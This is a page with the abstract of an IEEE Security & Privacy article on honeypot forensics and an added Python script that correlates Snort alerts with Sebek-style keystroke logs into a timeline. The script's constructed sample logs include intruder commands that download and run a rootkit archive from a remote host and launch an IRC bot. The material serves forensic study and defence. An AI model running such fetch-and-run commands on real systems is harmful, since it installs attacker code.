Honeypot forensics part 1: analyzing the network

4 Author(s)

A major goal of honeypot research is to improve our knowledge of blackhats from two perspectives: technical and ethnological. For the former, we want new ways to discover rootkits, Trojans, and potential zero-day exploits. For the latter, we want a better understanding of the areas of interest and hidden links between blackhat teams. One way to achieve these goals is to increase the verbosity of our honeypot logs and traces so that we learn every single action the intruder made. The most common tools for doing this are Sebek for system events and Snort for network activity. Unfortunately, there is no easy way to correlate information from these two sources, which complicates honeypot forensics. Whereas conventional computer forensics analyzes a system once we suspect it has been compromised, we expect honeypots to be compromised. Honeypot forensics therefore focuses on understanding the blackhat's techniques and tools, both before and after the intrusion of the honeypot. The article looks at network activity analysis, building the network timeline, and tools and techniques.
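The correlation problem the abstract describes (Sebek system events in one log, Snort alerts in another, no shared key between them) is usually solved in practice by normalizing both to timestamps and merging them into one timeline, then tying each keystroke to the traffic it produced. The script below is an added illustration written for this page, not code from the article or from the Sebek or Snort projects. It parses Snort's "-A fast" alert format (which omits the year, so the analyst supplies it) and a simplified key=value keystroke layout that stands in for Sebek's output; that layout, the sample lines, the local rule SIDs, and the honeypot address set are all constructed assumptions.

```python
"""Merge Snort alerts and Sebek-style keystroke records into one honeypot timeline."""
import re
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import List

# Assumptions for this example: the capture year (Snort fast alerts carry none),
# and the addresses that belong to honeypots on the sensor network.
CAPTURE_YEAR = 2004
HONEYPOTS = {"10.0.0.9"}

# Constructed sample input, not real captures. Snort lines follow the "-A fast"
# layout; the SIDs are in the local-rule range and mean nothing outside this page.
SNORT_FAST = """\
07/12-14:22:01.512345  [**] [1:1000001:1] HONEYPOT inbound SSH connection [**] [Priority: 2] {TCP} 10.0.0.5:4444 -> 10.0.0.9:22
07/12-14:22:40.003210  [**] [1:1000002:1] HONEYPOT outbound HTTP from honeypot [**] [Priority: 1] {TCP} 10.0.0.9:33012 -> 198.51.100.7:80
07/12-14:25:09.770001  [**] [1:1000003:1] HONEYPOT outbound IRC from honeypot [**] [Priority: 1] {TCP} 10.0.0.9:33020 -> 203.0.113.5:6667
"""

# Constructed keystroke records in a simplified key=value layout (an assumption;
# the real Sebek log tools print a different, richer record).
SEBEK_LOG = """\
2004-07-12 14:22:37 host=10.0.0.9 uid=0 pid=2311 com=bash data=wget http://198.51.100.7/rk.tgz
2004-07-12 14:23:02 host=10.0.0.9 uid=0 pid=2311 com=bash data=tar xzf rk.tgz; ./install
2004-07-12 14:25:06 host=10.0.0.9 uid=0 pid=2340 com=bash data=./bot -s 203.0.113.5
"""

SNORT_RE = re.compile(
    r"^(\d\d)/(\d\d)-(\d\d):(\d\d):(\d\d)\.(\d{6})\s+\[\*\*\]\s+\[(\d+):(\d+):(\d+)\]\s+(.*?)\s+\[\*\*\]"
    r".*?\{(\w+)\}\s+(\S+):(\d+)\s+->\s+(\S+):(\d+)\s*$")
SEBEK_RE = re.compile(
    r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) host=(\S+) uid=(\d+) pid=(\d+) com=(\S+) data=(.*)$")


@dataclass(order=True)
class Event:
    ts: datetime
    source: str                      # "snort" or "sebek"
    host: str                        # honeypot the event belongs to
    summary: str
    related: List["Event"] = field(default_factory=list, compare=False)


def parse_snort_fast(text: str, year: int = CAPTURE_YEAR) -> List[Event]:
    """Turn Snort fast-alert lines into events keyed on the honeypot side of the flow."""
    events = []
    for line in text.splitlines():
        m = SNORT_RE.match(line)
        if not m:
            continue                 # banners or unrelated output are skipped
        mon, day, hh, mm, ss, us, gid, sid, rev, msg, proto, src, sport, dst, dport = m.groups()
        ts = datetime(year, int(mon), int(day), int(hh), int(mm), int(ss), int(us))
        host = dst if dst in HONEYPOTS else src
        events.append(Event(ts, "snort", host,
                            f"[{gid}:{sid}:{rev}] {msg} {proto} {src}:{sport} -> {dst}:{dport}"))
    return events


def parse_sebek(text: str) -> List[Event]:
    """Turn the simplified keystroke records into events."""
    events = []
    for line in text.splitlines():
        m = SEBEK_RE.match(line)
        if not m:
            continue
        ts_s, host, uid, pid, com, data = m.groups()
        ts = datetime.strptime(ts_s, "%Y-%m-%d %H:%M:%S")
        events.append(Event(ts, "sebek", host, f"uid={uid} pid={pid} {com}: {data}"))
    return events


def build_timeline(snort_text: str, sebek_text: str) -> List[Event]:
    """Merge both sources into one chronological list: the network timeline."""
    return sorted(parse_snort_fast(snort_text) + parse_sebek(sebek_text))


def correlate(timeline: List[Event], window: timedelta = timedelta(seconds=5)) -> List[Event]:
    """Attach to each keystroke the Snort alerts on the same host within +/- window.

    A command followed within seconds by an outbound alert from the same honeypot
    is the pattern that ties an intruder's action to the traffic it generated.
    Clock skew between sensor and honeypot is the usual reason to widen the window.
    """
    for ks in (e for e in timeline if e.source == "sebek"):
        ks.related = [a for a in timeline
                      if a.source == "snort" and a.host == ks.host
                      and abs(a.ts - ks.ts) <= window]
    return timeline


def render(timeline: List[Event]) -> str:
    """Plain-text view of the merged timeline with correlated alerts indented."""
    lines = []
    for e in timeline:
        lines.append(f"{e.ts.isoformat(sep=' ')} {e.source:5} {e.host:10} {e.summary}")
        for r in e.related:
            lines.append(f"{'':19}   +-- matching alert: {r.summary}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(correlate(build_timeline(SNORT_FAST, SEBEK_LOG))))
```

On the constructed data the wget keystroke lines up with the outbound HTTP alert three seconds later and the bot launch with the IRC alert, while the untar produces no traffic and stays unmatched; the inbound SSH alert precedes the first keystroke by far more than the window, which is the expected shape of a login followed by a pause. In a real deployment the two clocks must be synchronized (or their offset measured) before the window is trusted.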

Published in:

IEEE Security & Privacy (Volume: 2, Issue: 4)